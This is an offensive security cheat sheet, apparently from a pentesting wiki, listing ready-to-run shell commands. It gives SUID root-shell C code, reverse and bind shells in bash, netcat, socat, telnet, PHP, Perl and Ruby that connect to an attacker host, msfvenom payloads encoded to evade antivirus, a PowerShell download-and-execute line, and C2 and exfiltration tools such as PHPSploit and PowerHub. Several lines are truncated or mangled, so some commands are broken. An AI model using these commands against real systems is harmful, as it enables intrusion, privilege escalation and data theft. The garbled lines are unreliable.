🐚Shells and Reverse Shells Cheat Sheet

SUID C Shells

bin/bash:

int main(void){

setresuid(0, 0, 0);

system("/bin/bash");

}

bin/sh:

int main(void){

setresuid(0, 0, 0);

system("/bin/sh");

}

TTY Shell:

python -c 'import pty; pty.spawn("/bin/bash")'

```
echo os.system('/bin/bash')
```
```
/bin/sh –i
```
```
execute('/bin/sh')
```

LUA:

```
!sh
```
- Privilege Escalation via nmap
```
:!bash
```
- Privilege escalation via vi

Fully Interactive TTY:

                                In reverse shell 
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
                                In Attacker console
stty -a
stty raw -echo
fg
                                In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

Spawn Ruby Shell:

```
exec "/bin/sh"
```

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d

Netcat:

```
nc -e /bin/sh ATTACKING-IP 80
```
```
/bin/sh | nc ATTACKING-IP 80
```

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Socket (Encrypted Shell):

Encrypted Bind and Reverse Shells with Socat (Linux/Windows)erev0s.com

Bind Shell:


# Victim machine

socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash // for linux

TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes // for windows

# Attacker machine

socat - TCP4:<Victim IP>:4443

Reverse Shell:

# Attacker Machine

socat -d -d TCP4-LISTEN:4443 STDOUT

# Victim Machine

socat TCP4:<Attacker IP>:4443 EXEC:/bin/bash //Linux

TCP4:<Attacker IP>:4443 EXEC:'cmd.exe',pipes //Windows

Encrypted Bind Shell:

# Genereate Openssl key and certificate

openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out bind.crt

# Covert the key file and certificate file to .pem file

cat bind.key bind.crt L > bind.pem

Share the .pem file to victim machine as this is a bind shell

# Victim Machine

socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash //for windows

socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:'cmd.exe',pipes //for windows


# Attacker Machine

socat - OPENSSL:<Victim IP>:4443,verify=0

Encrypted Reverse Shell:

# Genereate Openssl key and certificate

openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out bind.crt

# Covert the key file and certificate file to .pem file

cat bind.key bind.crt L > bind.pem

# Attacker Machine

socat -d -d OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork STDOUT


# Victim Machine

socat OPENSSL:192.168.168.1:4443,verify=0 EXEC:/bin/bash // for linux

OPENSSL:192.168.168.1:4443,verify=0 EXEC:'cmd.exe',pipes // for windows

Telnet Reverse Shell:

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

PHP:

```
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```
- (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash:

```
exec /bin/bash 0&0 2>&0
```

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done

# or: while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl:

```
exec "/bin/sh";
```
```
perl —e 'exec "/bin/sh";'
```

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Windows

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Windows

Stealthy Shells

#1

In the Attacker Machine

msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=<IP addr> LPORT=<port number> -f exe > xcmd.exe

msfvenom -p windows/shell/reverse_tcp -e rc4 -encrypt-key BlueSky LHOST=<IP addr> LPORT=<Port number> -f exe > zcmd.exe

In the Victim Machine

Invoke-WebRequest http://<ip address>/xcmd.exe -UseBasicParsing -Outfile xcmd.exe

Living Off the Land

Windows Tools

PowerShell
cmd.exe
cscript.exe
psexec.exe
wmic.exe
findstr -> for searching the file base
bitsadmin -> load content
regedit -> store information

Linux Tools

netcat, scp, curl, and wget for file transfers
grep and find for searching the file base
awk, gawk, gdb, and other tools

PowerHub

GitHub - AdrianVollmer/PowerHub: A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelistingGitHub

In the Attacker Machine

python3 powerhub.py <Target IP address>

In the Victim Machine

List-HubModules

Recon Local Groups

Get-LocalGroup | ConvertTo-Json | Out-file groups.json

PushTo-Hub groups.json

Exfiltration In the Attacker Machine

dos2unix groups.json

nano groups.json

PHPSploit

GitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoorGitHub

Start PHPSploit

./phpsploit --interactive

set target <Target URL>

exploit

Reverse Shell using Nishang (Windows Victim Host)

# Installation
sudo apt install nishang

# Nishang Default Shells Location
/usr/share/windows-binaries/nishnag/shells

# Start a python http server to share the payloads
python3 -m http.server 8080

# Start a netcat listener
nc -nlvp 1234

# Download and execute the script in the victim host
powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.6.228:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.6.2>

PreviousEnumeration Cheatsheet NextMeterpreter Cheat Sheet

Last updated 1 year ago

hashtagTTY Shell:

hashtagFully Interactive TTY:

hashtagSpawn Ruby Shell:

hashtagSocket (Encrypted Shell):

hashtagBind Shell:

hashtagReverse Shell:

hashtagEncrypted Bind Shell:

hashtagEncrypted Reverse Shell:

hashtagTelnet Reverse Shell:

hashtagPHP:

hashtagBash:

hashtagPerl:

hashtagStealthy Shells

hashtag#1

hashtagIn the Attacker Machine

hashtagIn the Victim Machine

hashtagLiving Off the Land

hashtagWindows Tools

hashtagLinux Tools

hashtagPowerHub

hashtagIn the Attacker Machine

hashtagIn the Victim Machine

hashtagRecon Local Groups

hashtagExfiltration In the Attacker Machine

hashtagPHPSploit

hashtagStart PHPSploit

hashtagReverse Shell using Nishang (Windows Victim Host)

TTY Shell:

Fully Interactive TTY:

Spawn Ruby Shell:

Socket (Encrypted Shell):

Bind Shell:

Reverse Shell:

Encrypted Bind Shell:

Encrypted Reverse Shell:

Telnet Reverse Shell:

PHP:

Bash:

Perl:

Stealthy Shells

#1

In the Attacker Machine

In the Victim Machine

Living Off the Land

Windows Tools

Linux Tools

PowerHub

In the Attacker Machine

In the Victim Machine

Recon Local Groups

Exfiltration In the Attacker Machine

PHPSploit

Start PHPSploit

Reverse Shell using Nishang (Windows Victim Host)